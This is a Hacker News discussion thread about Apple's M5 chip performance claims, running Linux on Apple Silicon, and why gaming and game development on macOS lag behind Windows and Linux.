    The M1 was a giant jump in overall system responsiveness, and the M-series seems to be averaging about a 20% year over year meaningful speed increase. If you use AI/ML/GPU, the M-series yearly upgrade is even better. Otherwise, for most things it's a nice and noticeable bump but not a Intel-to-M1 jump even from M1-to-M4.

  • semiinfinitely 17 hours ago

    All those extra flops are spent computing light refraction in the liquid glass of the ui

  • tylerhou 18 hours ago

    > M5 is 4-6x more powerful than M4

    In GPU performance (probably measured on a specific set of tasks).

  • james4k 18 hours ago

    Those marketing claims are each about a very specific workload, not about general performance. Yes, it is often misleading.

  • 0x457 17 hours ago

    Well, if you read the very next thing after 4x, you will notice it says "the peak GPU compute performance for AI compared to M4".

    The disconnect here is that you can't read. Sorry, no other way to say it.

  • tmountain 18 hours ago

    Probably synthetic benchmarks that don't represent actual bottlenecks in application usage. How much of what you are doing is actually CPU bound? Your machine still has to do I/O, and even though that's "very fast" these days, it's not happening inside your CPU, so you'll only see the actual improvements when running workloads that benefit from the performance improvements (i.e., complex calculations that can live in the CPU and its cache).

  • vintagedave 18 hours ago

    What scares me is that my M2 started seeing performance issues in macOS recently. Safari is sometimes slow (I admit I stress it with many tabs, but it wasn't like this a year ago.) Somehow the graphics in general seems slower on Tahoe, eg the effects when minimising a window.

    I am deeply concerned all the performance benefits of the new chips will get eaten away.

    • MobiusHorizons 17 hours ago

      You are probably actually witnessing the reduction in performance of swap as your drive fills up. Check the memory pressure in activity manager. The fix is pretty easy (delete stuff).

      • vintagedave 16 hours ago

        Thanks, but I have over a hundred gig free. And I got the max RAM I could (24GB.) I feel like the machine _should_ be capable in 2025.

    • Tagbert 17 hours ago

      26.0 is very much a dot-zero release. It is missing a lot of optimizations and there are some open bugs like memory leaks. Initial reports on 26.1 show a lot of improvement in those. The 3rd beta of 26.1 just came out yesterday. They will probably launch this new version with improved optimizations by end of October.

  • justinator 18 hours ago

    You know, 64% of statistics are made up.

    • NetMageSCW 11 hours ago

      I’m pretty sure that should be 100%.

  • omikun 15 hours ago

    Says M5 is 4x faster than M4 and 6x faster than M1 for AI compute on the GPU. Basically M4 was only a little faster than M1 at this task. Ex. if M5 is 24 AI TOPS, M4 is 6 AI TOPS, and M1 is 4 AI TOPS.

    Unless you're looking at your MacBook running LM Studio you won't be seeing much improvement in this regard.

  • monocasa 18 hours ago

    Each is a different specific benchmark, so they don't stack the way you're doing.

    This is 4-6x faster in AI for instance.

  • foota 17 hours ago

    User experience (for most things, unless you sit there encoding video all day) isn't really related to raw performance so much as latency. Processor power can help there, but design and at the limit memory latency is the key constraint.

  • Jnr 18 hours ago

    It states it is "peak performance". Probably in a very specific use case. Or maybe it reaches the peak for an extremely short period of time before it drops the performance.

  • freehorse 18 hours ago

    They are not 4x more powerful than the previous generation at everything, or even at the same thing every time, so it does not stuck up. Here 4x refers sth wrt LLMs running on the GPU.

    I use both an M1 max and an M3 max, and frankly I do not notice much difference if you control for the core count in most stuff. And for running LLMs they are almost the same performance. I think from M1-M3 there was no much performance increase in general.

  • oulipo2 17 hours ago

    Agreed, if I have 40 tabs opened on Chrome, my M1 macbook is no longer responsive... I'm not sure about their performance claims, apart from some niche GPU rendering for games, which constitutes about 0% of my daily laptop usage

  • tester756 18 hours ago

    Because this is bullshit, lies, marketing

  • potatolicious 17 hours ago

    Because there's more to "actual user experience" than peak CPU/GPU/NPU workload.

    Firstly, the M5 isn't 4-6x more powerful than M4 - the claim is only for GPU, only for one narrow workload, not overall performance uplift. Overall performance uplift looks like ~20% over M4, and probably +100% over M1 or so.

    But there is absolutely a massive sea change in the MacBook since Intel 5 years ago: your peak workloads haven't changed much, but the hardware improvements give you radically different UX.

    For one thing, the Intel laptops absolutely burned through the battery. Five years ago the notion of the all-day laptop was a fantasy. Even relatively light users were tethered to chargers most of the day. This is now almost fully a thing of the past. Unless your workloads are very heavy, it is now safe to charge the laptop once a day. I can go many hours in my workday without charging. I can go through a long flight without any battery anxiety. This is a massive change in how people use laptops.

    Secondly is heat and comfort. The Intel Macs spun their fans up at even mild workloads, creating noise and heat - they were often very uncomfortably warm. Similar workloads are now completely silent with the device barely getting warmer than ambient temp.

    Thirdly is allowing more advanced uses on lower-spec and less expensive machines. For example, the notion of rendering and editing video on a Intel MacBook Air was a total pipe dream. Now a base spec MacBook Air can do... a lot that once forced you into a much higher price point/size/weight.

    A lot of these HN conversations feel like sports car fans complaining: "all this R&D and why doesn't my car go 500mph yet?" - there are other dimensions being optimized for!

bfrog 20 hours ago

The big win would be a linux capable device. I don't have any interest in mac os x but the apple m parts always seem amazing.

In theory this would be where qualcomm would come in and provide something but in practice they seem to be stuck in qualcomm land where only lawyers matter and actual users and developers can get stuffed.

  • cogman10 19 hours ago

    Yeah, this is the biggest hole in ARM offerings.

    The only well supported devices are either phones or servers with very little in between.

    Even common consumer devices like wifi routers will have ARM SOCs with pinned version of the kernel they are attached to which will get supported for 1 to 2 years at most.

  • nc 2 hours ago

    Asahi linux is making great progress. The only thing they have left to make it a truly capable linux environment is USB-C external display support. Once that lands I plan to use my M-series mac as a Linux machine.

  • mrkeen 19 hours ago

    I have a pretty good time on Asahi Fedora (macbook air M1). It supposedly also supports M2 but no higher.

    And it's a PITA to install (needs to be started within macosx, using scripts, with the partitions already in a good state)

    • neobrain an hour ago

      > And it's a PITA to install

      Curiously I found it a breeze since it didn't require digging out a flashable boot medium and pointing your BIOS to it. Calling a script from your normal desktop environment and having it automatically boot into the installer was really nice.

      > with the partitions already in a good state)

      What's this about? The script takes care of resizing the macOS partitions and creating new ones for Linux.

    • mysteria 15 hours ago

      The issue is that it's hacky, and in that case I'd rather go with a Intel or AMD x86 system with more or less out of the box Linux support. What we're looking for is a performant ARM system where Linux is a first class citizen.

    • Gethsemane 19 hours ago

      If I was less lazy I could probably find this answer online, but how do you find the battery life these days? I'd love to make the switch, but that's the only thing holding me back...

    • 2OEH8eoCRo0 19 hours ago

      How's Thunderbolt and display port alt mode?

      • neobrain an hour ago

        Actively in progress, with related patches submitted to the kernel mailing list as recently as 3 days ago.

  • walterbell 18 hours ago

    Apparently the Windows exclusivity period has ended, so Google will support Android and ChromeOS on Qualcomm X2-based devices, https://news.ycombinator.com/item?id=45368167

    • bfrog 11 hours ago

      I mean if the experience is as good as any x86 laptop I'd try it in terms of installing any linux distro I want. No interest in android/chromeos myself.

      • walterbell 11 hours ago

        Even Android/ChromeOS should support standard Debian Linux in a VM. If Qualcomm makes a Linux dev box available (announced last year for X1, then sadly cancelled) with UEFI/SystemReady, then mainline Linux developers could contribute to device support.

littlecranky67 21 hours ago

And here I am, selling my Macbook M4 Pro to buy a Macbook Air and a dedicated gaming machine. I've tried gaming on the Macbook with Heroic, GPTK, Whiskey, RPCS3 emu and some native. When a game runs, the performance is stunning for a Laptop - but there is always glitches, bugs and annoyances that take out the joy. Needles to mention lack of support from any sort of online multiplayer, due to the lack of anticheat support.

I wish Apple would take gaming more seriously and make GPTK a first class citizen such as Proton on Linux.

  • ryao 20 hours ago

    Off the top of my head, here is what that needs:

      1. Implementing PR_SET_SYSCALL_USER_DISPATCH
      2. Implementing ntsync
      3. Implementing OpenGL 4.6 support (currently only OpenGL 4.1 is supported)
      4. Implementing Vulkan 1.4 with various extensions used by DXVK and vkd3d-proton.
    
    That said, there are alternatives to those things.

      1. Not implementing this would just break games like Jurassic World where DRM hard codes Windows syscalls. I do not believe that there are many of these, although I could be wrong.
      2. There is https://github.com/marzent/wine-msync, although implementing ntsync in the XNU kernel would be better.
      3. The latest OpenGL isn't that important these days now that Vulkan has been widely adopted, although having the latest version would be nice to have for parity. Not many things would suffer if it were omitted.
      4. They could add the things needed for MoltenVK to support Vulkan 1.4 with those extensions on top of Metal:
    
    https://github.com/KhronosGroup/MoltenVK/issues/203

    It is a shame that they do not work with Valve on these things. If they did, Proton likely would be supported for MacOS from within Steam and the GPTK would benefit.

  • bob1029 20 hours ago

    > lack of anticheat support.

    I just redid my windows machine to get at TPM2.0 and secure boot for Battlefield 6. I did use massgrave this time because I've definitely paid enough Microsoft taxes over the last decade. I thought I would hate this new stuff but it runs much better than the old CSM bios mode.

    Anything not protected by kernel level anti cheats I play on my steam deck now. Proton is incredible. I am shocked that games like Elden Ring run this well on a linux handheld.

    • zhivota 6 hours ago

      It's funny considering what people are telling me about the rampant cheating in that game. May settle out eventually but these anti cheat systems seem to not do much.

  • dlojudice 20 hours ago

    Good point. Many people (including me) switched to Apple Silicon with the hope (or promise?) of having just one computer for work and leisure, given the potential of the new architecture. That didn't happen, or only partially, which is the same.

    In my case, for software development, I'd be happy with an entry-level MacBook Air (now with a minimum of 16GB) for $999.

  • unsupp0rted 20 hours ago

    I can't sell my MacBook Pro because the speakers are so insanely good. Air can't compare. The speakers are worth the extra kilos.

    • HDThoreaun 18 hours ago

      I have never once used my laptop speakers. Not saying youre wrong but its crazy how different priorities for products can be

      • prewett 15 hours ago

        I shocked when I tried out the 2019 MBP speakers, they were almost as good as my (low-end) studio headphones. I was even more shocked with the M2 speakers, which are arguably better (although not as flat frequency response, I think, there definitely is something a little artificial, but it sounds really good). I really could not imagine laptop speakers being even close to par to decent headphones. Perhaps they aren't on par with $400 headphones, I've never had any of those. But now by preference I listen on the laptop speakers. It's not a priority--I'm totally happy to go back to the headphones--more like an unexpected perk.

        • adastra22 15 hours ago

          But why would you ever use the speakers?

          • unsupp0rted 13 hours ago

            I work alone- I can use the speakers at any volume without bothering anybody or wearing anything in my ears or on my head. It's wonderful.

  • hannesfur 20 hours ago

    I agree—the difference between the different compatibility layers and native games is very steep at times. Death Stranding on my M2 Pro looks so good it’s hard to believe, but running GTA Online is so brittle and clunky… Even when games have native macOS builds, it’s rare to find them with Apple Silicon support (and even rarer with Metal support). There is a notable exception though: Arma 3 has experimental Apple Silicon support, though it comes with significant limitations. (Multiplayer, flying & mods) Although I don’t believe it’s in Apple’s interest, gaming on Linux might become an option in the future, even on Mac, but the lack of ARM builds is an even bigger problem there…

    Since I am playing mostly MSFS 2024 these days I currently use GeForce Now which is fine, but cloud gaming isn’t still quite there yet…

    • kllrnohj 19 hours ago

      > Death Stranding on my M2 Pro looks so good it’s hard to believe,

      Death Stranding is a great looking game to be sure, but it's also kinda hard to get excited about a 5 year old game achieving rtx 2060 performance on a $2000+ system. And that was apparently worthy of a keynote feature...

  • gbil 19 hours ago

    On top of that, what is the strategy from Apple on gaming? Advertise extra performance and features that you only get if you upgrade your whole device? This is non-sustainable to put it mildly. There are egpu enclosures with TB5, developing something like that for the Mac would make more sense if they really cared about gaming anyhow.

  • ge96 19 hours ago

    I'm gonna be looking for a 4080 in SFF form factor since my current gaming rig can't get upgraded to win 11. Also I wouldn't mind a smaller desktop.

    edit: for now I'll get that win 10 ESU

  • gwbas1c 20 hours ago

    Honestly, gaming consoles are so much cheaper and "no hassle." I never games on my Mac.

    • littlecranky67 18 hours ago

      More expensive on the long run, as the games are more expensive and you need some kind of subscription to play online.

  • dimgl 20 hours ago

    Yeah I agree. If it weren't for gaming I would have already uninstalled Windows permanently. It's really unfortunate because it sticks out as the one product in my house that I truly despise but I can't get rid of, due to gaming.

    I've been trying to get Unreal Engine to work on my Macbook but Unity is an order of magnitude easier to run. So I'm also stuck doing game development on my PC. The Metal APIs exist and apparently they're quite good... it's a shame that more engines don't support it.

  • mrcwinn 19 hours ago

    Going back to the Air's screen from your Pro will be a steep fall.

    • littlecranky67 18 hours ago

      Not really, 95% of the time I use it in a dock with 2 external screens.

  • bamboozled 21 hours ago

    Sometimes I just feel like buying the latest and greatest game, I have an m4 too, the choices are usually quite abysmal. I agree.

    • qnpnp 18 hours ago

      My solution is cloud gaming in that case, such as GeforceNow (for compatible games), or Shadow (for a whole PC to do as you please).

      • bamboozled 9 hours ago

        Thanks, will check it out!

  • sapiogram 20 hours ago

    > I wish Apple would take gaming more seriously and make GPTK a first class citizen such as Proton on Linux.

    Note that games with anticheat don't work on Linux with Proton either. Everything else does, though.

    • dralley 20 hours ago

      Several games with anticheat work. But it's up to the developers whether they check the box that allows it to work, which is why even though both Apex Legends and Squad use Easy Anticheat, Squad works and Apex does not.

      Of course some anticheats aren't supported at all, like EA Javelin.

      • ascagnel_ 19 hours ago

        Apex Legends is an interesting case because EA/Respawn initially shipped with first-class support for the Steam Deck (going as far as to make changes to the game client so it would get a "Verified" badge from Valve) -- including "check[ing] the box that allows it to work". However, the observation was that the anti-cheat code on Linux wasn't as effective, so they eventually dropped support for it.

        https://forums.ea.com/blog/apex-legends-game-info-hub-en/dev...

    • rpdillon 20 hours ago

      Many of them do, but it's a game of cat and mouse, so it's more hit and miss than I would like.

  • gjsman-1000 20 hours ago

    Many people blame the lack of OpenGL/Vulkan... but I really don't buy it. It doesn't pass the sniff test as an objection. PlayStation doesn't support OpenGL/Vulkan (they have their own proprietary APIs, GNM, GNMX, PSSL). Nintendo supports Vulkan but performance is so bad, almost everyone uses the proprietary API (NVN / NVN2). Xbox obviously doesn't accept OpenGL/Vulkan either, requiring DirectX. Understanding of Metal is widespread in mobile gaming, so it's weird AAA couldn't pull from that industry if they wished.

    • coldpie 20 hours ago

      The primary reason is Apple's environment is too unstable for gaming's most common business model. Most games are developed, released, and then sold for years and years with little or no maintenance. Additionally, gamers expect the games they purchased to continue to work indefinitely. Apple regularly breaks backwards compatibility in a wide variety of ways (code signing requirements; breaking OS API changes; hardware architecture changes). That means software run on Apple OSes must be constantly maintained or else it will eventually stop working. Most games aren't developed like that.

      No one who was forced to write a statement like [this](https://help.steampowered.com/en/faqs/view/5E0D-522A-4E62-B6...) is going to be enthusiastic about continuing to work with Apple.

      • galad87 20 hours ago

        Game developers make most of the money shortly after a game release, so having a 15 years old game not working anymore shouldn't make much difference in term of revenues.

        Anyway, the whole situation was quite bad. Many games were still 32-bit, even if macOS itself had been mainly 64-bit for almost 10 years or more. And Valve didn't help either, the Steam store is full of 64-bit mislabeled as 32-bit. They could have written a simple script to check whether a game is actually 64-bit or not, instead they decided to do nothing and keep their chaos.

        The best solution would have been a lightweight VM to run old 32-bit games, nowadays computer are powerful enough to do so.

      • gjsman-1000 20 hours ago

        I've heard this argument, but it also doesn't pass the sniff test in 2025.

        1. When is the next transition on bits? Is Apple going to suddenly move to 128-bit? No.

        2. When is the next transition on architecture? Is Apple going to suddenly move back to x86? No.

        3. When is the next API transition? Is Apple suddenly going to add Vulkan or reinvigorate OpenGL? No. They've been clear it's Metal since 2014, 11 years ago. That's plenty of time for the industry to follow if they cared, and mobile gaming has adopted it without issue.

        We might as well complain that the PlayStation 4 was completely incompatible with the PlayStation 3.

        • fruitworks 20 hours ago

          What happens when apple switches to riscv, or depreciates versions of metal in a backwards incompatible way, or mandates some new code signing technique?

          The attitude in the apple developer ecosystem is that apple tells you to jump, and you ask how high.

          You could complain that Playstation 4 software is incompatible with Playstation 3. This is the PC gaming industry, there are higher standards for the compatibility of software that only a couple companies can ignore.

          • gjsman-1000 20 hours ago

            Apple will never transition to RISC-V; especially when they cofounded ARM. They have 35 years of institutional knowledge in ARM. Their cores and techniques are licensed and patented with mixtures of their own IP and ARM-compatible IP. That is decades away, if ever. Even the assumption RISC-V will eventually achieve equality with ARM performance is untested; as sometimes ISAs do fail at scale (Itanium anyone? While unlikely to repeat; even a discovered 5% structural difference in the negative would handicap adoption permanently.)

            "This is the PC gaming industry"

            Who said Apple needed to present themselves as a PC gaming alternative over a console alternative?

            • fruitworks 20 hours ago

              Consoles are dying and PCs are replacing them. Like the original commenter suggested, people want to run PC games. The market has decided that the benefits of compatibility outweigh the added complexity. On the PC you have access to a massive expanding back-catalog of old software, far more competition in the market, mods, and you're able to run whatever software you want alongside games (discord, teamspeak, game streaming, etc.).

              Macs are personal computers, whether or not they come from some official IBM Personal Computer compatibility bloodline.

              • gjsman-1000 19 hours ago

                Steam Deck - 6 million

                Sega Saturn - 9 million

                Wii U - 13 million

                PlayStation 5 - 80 million

                Nintendo Switch - 150 million

                Nintendo Switch 2 opening weekend - 4 million in 3 days

                Sure.

                • Sohcahtoa82 18 hours ago

                  And in the last 48 hours, Steam peaked at 39.5M users online, providing a highly pessimistic lower-bound on how many PC gamers there are.

                  https://store.steampowered.com/stats/stats/

                  If you consider time zones (not every PC gamer is online at the same time), the fact that it's not the weekend, and other factors, I'd estimate the PC gaming audience is at least 100M.

                  Unfortunately, there's no possible way to get an exact number. There are multiple gaming PC manufacturers, not to mention how many gaming PCs are going to be built by hand. I'm part of a PC gaming community, and nearly 90% of us have a PC built by either themselves or a friend/family. https://pdxlan.net/lan-stats/

        • coldpie 20 hours ago

          I mean, I worked in this space, and I'm telling you why many of the people I worked with weren't interested in supporting Apple. I'm happy to hear your theories if you don't like mine, though.

          • gjsman-1000 20 hours ago

            I think the past bit people, but unlike the PS4 transition or gaming consoles in the past (which were rarely backwards compatible), there wasn't enough cultural momentum to plow through it... leaving "don't support Apple" as a bit of a institutional memory at this point, even though the odds of another transition seem almost nonexistent. What would it even be? 128 bit? Back to x86? Notarization++? Metal 4 incompatible with Metal 1?

            • coldpie 20 hours ago

              Yeah, I buy that, so I think we are actually agreeing with each other. The very rough backwards support story Apple has had for the past decade, which I mentioned, has made people uninterested in supporting the platform, even if they're better about it now, as you claim (though I'm unconvinced about that personally, having worked on macOS software for more than a decade).

              > What would it even be? 128 bit? Back to x86? Notarization++? Metal 4 incompatible with Metal 1?

              Sure, I can think of lots of things. Every macOS update when I worked in this space broke something that we had to go fix. Code signature requirements change a bit in almost every release, not hard to imagine a 10-year-old game finally running afoul of some new requirement. I can easily see them removing old, unmaintained APIs. OpenGL is actively unmaintained and I would guess a massive attack vector, not hard to see that going away. Have you ever seen their controller force feedback APIs? Lol, they're so bad, it's a miracle they haven't removed those already.

            • bigyabai 18 hours ago

              > even though the odds of another transition seem almost nonexistent.

              You see, the existence of that "almost" is already less confidence than developers have on every game console as well as Linux and Windows.

        • jolux 20 hours ago

          > I've heard this argument, but it also doesn't pass the sniff test in 2025.

          I mean, it's at least partially true. I used to play BioShock Infinite on my MacBook in high school, there was a full port. Unfortunately it's 32 bit and doesn't run anymore and there hasn't been a remaster yet.

    • littlecranky67 20 hours ago

      I don't buy it either, because Apples GPTK works similar as Proton - they have a DX12-to-Metal Layer that works quite well - if it works. And their GPTK is based on wine, just as proton. It is more other annoyances like lack of steam support. There are patched version of steam circulating that run in GPTK though (offline mode) but that is where everything gets finnicky and brittle. It is mostly community efforts, and I think gaming could be way better on Apple if they embrace the Proton-approach that they started with GPTK.

      • ldoughty 20 hours ago

        Apple collects no money from Steam sales, so they don't see a reason to support it.

        You don't buy Apple to use your computer they way you want to use it. You buy it to use it the way they tell you to. E.g. "you're holding it wrong" fiasco.

        In some ways this is good for general consumers (and even developers, with limited config comes less unpredictablilty)... However this generally is bad for power users or "niche" users like Mac gamers.

        • littlecranky67 19 hours ago

          > Apple collects no money from Steam sales, so they don't see a reason to support it.

          That is true, but now they are in a position where their hardware is actually more affordable and powerful than their Windows/x86 counterpart - and Win 11 is a shitload of adware and an annoyance in itself, layered ontop of a OS. They could massively expand their hardware sales to the gaming sector.

          I'm eyeing at a framework Desktop with an AMD AI 395 APU for gaming (I am happy with just 1080p@60) and am looking at 2000€ to spend, because I wan't a small form factor. Don't quote me on the benchmarks, but a Mac Mini on M4 Pro is probably cheaper and more powerful for gaming - IF it had proper software support.

        • raw_anon_1111 19 hours ago

          Apple collects no money from Photoshop, Microsoft, or anything else that runs on the Mac besides the tiny minority of apps sold on the Mac App Store.

          Not to mention many subscription services on iOS that don’t allow you to subscribe through the App Store.

    • kllrnohj 19 hours ago

      PlayStation, Nintendo, and Xbox all have 10s of millions of gamers each. Meanwhile MacOS makes up ~2% of steam users which is probably a pretty good proxy for the number of MacOS gamers.

      Why would I do anything bespoke at all for such a tiny market? Much less an entirely unique GPU API?

      Apple refusing to support OpenGL and Vulkan absolutely hurt their gaming market. It increased the porting costs for a market that was already tiny.

      • littlecranky67 17 hours ago

        > Why would I do anything bespoke at all for such a tiny market?

        Because there is a huge potential here to increase market share.

  • SigmundA 21 hours ago

    Yep, I use Moonlight / Sunshine / Apollo to stream from my gaming PC, so I still use my Mac setup but get nearly perfect windows gaming with PC elsewhere in house.

    This has been by far the best setup until Apple can take gaming seriously, which may never happen.

ironman1478 18 hours ago

It's surprising to me macs aren't a more popular target for games. They're extremely capable machines and they're console-like in that there isn't very much variation in hardware, as opposed to traditional PC gaming. I would think that it's easier to develop a game for a MacBook than a Windows machine where you never know what hardware setup the user will have.

  • shantara 18 hours ago

    The main roadblock for porting the games to Mac has never been the hardware, but Apple themselves. Their entire attitude is that they can do whatever they please with their platforms, and expect the developers to adjust to the changes, no matter how breaking. It’s a constant support treadmill, fixing the stuff that Apple broke in your previously perfectly functioning product after every update. If said fixing is even possible, like when Apple removed support for 32-bit binaries altogether, rendering 3/4 of macOS Steam libraries non-functional. This works for apps, but it‘s completely antithetical to the way game development processes on any other platform are structured. You finish a project, release it, do a patch cycle, and move on.

    And that’s not even talking about porting the game to either Metal or an absolutely ancient OpenGL version that could be removed with any upcoming OS version. A significant effort just to address a tiny market.

    • coffeeaddict1 18 hours ago

      > an absolutely ancient OpenGL version

      I still don't get this. Apple is a trillion dollar company. How much does it cost to pay a couple of engineers to maintain an up to date version on top of Metal? Their current implementation is 4.1, it wouldn't cost them much to provide one for 4.6. Even Microsoft collaborated with Mesa to build a translation on top of dx12, Apple could do the same.

      • Schiendelman 9 hours ago

        It's because of Khronos' licensing of their IP; it seems like it's not compatible with Apple's legal team's interpretation of what they need.

      • astrange 16 hours ago

        They can't do Khronos things because they don't get along with Khronos. Same reason they stopped having NVidia GPUs forever ago.

      • mandarax8 16 hours ago

        Their current OpenGL 4.1 actually does run on top of metal making it even more blatantly obvious that they just don't want to.

    • astrange 18 hours ago

      > If said fixing is even possible, like when Apple removed support for 32-bit binaries altogether, rendering 3/4 of macOS Steam libraries non-functional.

      IIRC developers literally got 15 years of warning about that one.

      • ascagnel_ 17 hours ago

        Apple's mistake was allowing 32-bit stuff on Intel in the first place -- if they had delayed the migration ~6 months and passed on the Core Duo for Core 2 Duo, it would've negated the need to ever allow 32-bit code on x86.

      • bigyabai 18 hours ago

        IIRC that didn't convince many developers to revisit their software. I still have hard drives full of Pro Tools projects that open on Mojave but error on Catalina. Not to mention all the Steam games that launch fine on Windows/Linux but error on macOS...

        • astrange 17 hours ago

          Yes, game developers can't revisit old games because they throw out the dev environments when they're done, or their middleware can't get updated, etc.

          But it's not possible to keep maintaining 32-bit forever. That's twice the code and it can't support a bunch of important security features, modern ABIs, etc. It would be better to run old programs in a VM of an old OS with no network access.

          • Rohansi 14 hours ago

            Another big, non-technical reason is most games make most of their money around their release date. Therefore there is no financial benefit to updating the game to keep it working. Especially not on macOS where market share is small.

          • bigyabai 14 hours ago

            > But it's not possible to keep maintaining 32-bit forever.

            Apple had the money to support it, we both know that. They just didn't respect their Mac owners enough, Apple saw more value in making them dogfood iOS changes since that's where all the iOS devs are held captive. Security was never a realistic excuse considering how much real zombie code still exists in macOS.

            Speaking personally, I just wanted Apple to wait for WoW64 support to hit upstream. Their careless interruption of my Mac experience is why I ditched the ecosystem as a whole. If Apple cannot invest in making it a premium experience, I'll take my money elsewhere.

            • astrange 11 hours ago

              > Apple had the money to support it, we both know that.

              Not possible without forking the OS. No amount of money can make software development faster forever.

              https://en.wikipedia.org/wiki/The_Mythical_Man-Month

              Especially because Apple has a functional design which means there is nearly no redundancy; there's only one expert in any given field and that expert doesn't want to be stuck with old broken stuff. Nor does anyone want software updates to be twice as big as they otherwise would be, etc.

              > Security was never a realistic excuse considering how much real zombie code still exists in macOS.

              Code doesn't have security problems if nobody uses it. But nothing that's left behind is as bad as, say, QuickTime was.

              nb some old parts were replaced over time as the people maintaining them retired. In my experience all of these people were named Jim.

              • bigyabai 3 hours ago

                > there's only one expert in any given field and that expert doesn't want to be stuck with old broken stuff.

                Oh, my apologies to their expert. I had no idea that my workload was making their job harder, how inconsiderate of me. Anyone could make the mistake of assuming that the Mac supported these workloads when they use their Mac to run 32-bit plugins and games.

    • ryandrake 17 hours ago

      The company in general never really seemed that interested in Games, and that came right from Steve Jobs. John Carmack made a Facebook post[1] several years ago with some interesting insider insights about his advocacy of gaming to Steve Jobs, and the lukewarm response he received. They just never really seemed to be a priority at Apple.

      1: https://www.facebook.com/permalink.php?story_fbid=2146412825...

      • astrange 16 hours ago

        It's impossible to care about video games if you live in SV because the weather is too nice. You can feel the desire to do any indoor activity just fade away when you move there. This is somehow true even though there's absolutely nothing to do outside except take walks (or "go hiking" as locals call it) and go to that Egyptian museum run by a cult.

        Somehow Atari, EA and PlayStation are here despite this. I don't know how they did it.

        Meanwhile, Nintendo is successful because they're in Seattle where it's dark and rains all the time.

    • zarzavat 15 hours ago

      Gamedevs have not forgotten that Apple attempted to get Unreal Engine banned from all their platforms, thus rug pulling every game built on top of it.

      It was only the intervention of Microsoft that managed to save Apple from their own tantrum.

  • lazypenguin 18 hours ago

    As far as I’ve seen, Apple is to blame here as they usually make it harder to target their platform and don’t really try to cooperate with the rest of the industry.

    As a game developer, I have to literally purchase Apple hardware to test rather than being able to conveniently download a VM

    • jjtheblunt 18 hours ago

      for games, how would you test in a VM, when games so explicitly want direct hardware access?

      i am obviously misunderstanding something, i mean.

      • zulban 17 hours ago

        I run Linux and test my Windows releases on a VM. It works great.

        Sure, I'm not doing performance benchmarking and it's just smoke tests and basic user stories, but that's all that 98% of indie developers do for cross platform support.

        Apple has been intensely stupid as a platform to launch on, though I did do it eventually. I didn't like Apple before and now I like it even less.

      • lazypenguin 15 hours ago

        I develop a game that easily runs on much weaker hardware and runs fine in a VM, I would say most simple 3D & 2D games would work fine in a VM on modern hardware.

        However, these days it's possible pass-through hardware to your VM so I would be able to pass through a 2nd GPU to MacOS...if it would let me run it as a guest.

      • Liquix 15 hours ago

        on linux, KVM provides passthrough for GPUs and other hardware, so the VM "steals" the passed through resources from the host and provides near-native performance.

    • neogodless 18 hours ago

      I'm not a subject matter expert, but I do find it a little odd to read the second half of that. I'd expect, beyond development/debugging, there's certainly a phase of testing that requires hardware that matches your target system?

      Like, I get if you develop for consoles, you probably use some kind of emulation on your development workstation, which is probably running Windows. Especially for consoles like XBOX One or newer, and PS4 or newer, which are essentially PCs. And then builds get passed off to a team that has the hardware.

      Is anyone developing games for Windows on Apple hardware? Do they run Parallels and call it a day? How is the gaming performance? If the answers to those 3 questions are "yes, yes, great", then Apple supports PC game development better than they support Apple game development?

      • lazypenguin 15 hours ago

        Basically you are correct, MacOS has to be treated like a console in that way. Except you get all the downsides of that development workflow with none of the upsides. The consoles provide excellent debugging and other tools for targeting their platform, can't say the same for MacOS.

        For testing, I can do a large amount of testing in a VM for my game. Maybe not 100% and not full user testing but nothing beats running on the native hardware and alpha/beta with real users.

        Also, since I can pass through hardware to my VM I can get quite good performance by passing through a physical GPU for example. This is possible and quite straightforward to do on a Linux host. I'm not sure if it's possible using Parallels.

      • throwuxiytayq 18 hours ago

        > Like, I get if you develop for consoles, you probably use some kind of emulation on your development workstation

        I don’t think anybody does this. I haven’t heard about official emulators for any of the mainstream consoles. Emulation would be prohibitively slow.

        Developers usually test on dedicated devkits which are a version of the target console (often with slightly better specs as dev builds need more memory and run more slowly). This is annoying, slow and difficult, but at least you can get these dev kits, usually for a decent price, and there’s a point to trying to ship on those platforms. Meanwhile, nobody plays games on macs, and Apple is making zero effort to bring in the developers or the gamers. It’s a no-chicken-and-no-egg situation, really.

    • whatever1 18 hours ago

      You do it for Xbox and PlayStation and Nintendo.

    • cesarvarela 18 hours ago

      I'm sure you literally purchased Nvidia hardware for game development.

      • stronglikedan 17 hours ago

        A component is much cheaper than an entire dedicated system (which would of course contain a similar component).

        • cesarvarela 15 hours ago

          I don't know; a 5090 costs about 3k, a 5070 about 500. You can either buy a MacBook Pro or a Mac Mini. Seems reasonable.

  • jayd16 18 hours ago

    Mac dev sucks. You're forced to use macos and xcode (for the final build anyway). You're not able to virtualize the build machines.

    Apple is actively hostile to how you would build for Linux or PC or console.

    • matthew-wegner 18 hours ago

      > You're not able to virtualize the build machines.

      Sure you can. And officially, too. Apple still ships a bunch of virtualization drivers in macOS itself. Have a look:

      /System/Library/Extensions/IONetworkingFamily.kext/Contents/PlugIns/AppleVmxnet3Ethernet.kext

      Whether or not you're using ESXi, or want to, is an entirely different question. But "you're not able to" is simply incorrect. I virtualize several build agents and have for years with no issues.

      macOS 26 is the last major version to support Intel, so once macOS 28 is latest this will probably become impossible (macOS 26 should be able to use Xcode 27, but maybe the platform removal will change this previous year's OS support from continuing).

      • GTP 18 hours ago

        > Apple still ships a bunch of virtualization drivers in macOS itself.

        I think OP means virtualizing on something that isn't Apple.

      • jayd16 18 hours ago

        Interesting. The last I looked into it, you could only officially do this on Mac hardware (defeating the purpose).

        You can get an xcode building for arm Macs on PC hardware with this?

    • nasseri 18 hours ago

      This is simply not the case. Every major game framework/engine targets Mac natively.

      If you are building your engine/game from scratch, you absolutely do not need to use Xcode

      • jayd16 18 hours ago

        Why don't you look through the Unreal and Unity docs and see if you can make a build without a Mac and xcode.

        • nasseri 18 hours ago

          I think I misunderstood your point as “developing a game on Mac sucks”, vs “developing for Mac without a Mac sucks” which I absolutely can’t disagree with

        • nasseri 18 hours ago

          Yea you’re right I skipped over the part where you said the final build required it.

          Nonetheless that’s a small fraction of the time spent actually developing the game.

          • jayd16 18 hours ago

            Ideally, it's a continuous part of development because you're making daily (or more) builds and testing them.

            That makes it a continuous headache to keep your Mac builders up.

            It means you need to double dev hardware costs or more as you need a gaming PC to target your core audience and Macs handle the mac bugs.

            It means your mac build machines are special snowflakes because you can't just use VMs.

            The list goes on and on of Mac being actively hostile to the process.

            Just Rider running on a Mac is pleasant sure, but that's not the issue.

    • coldtea 18 hours ago

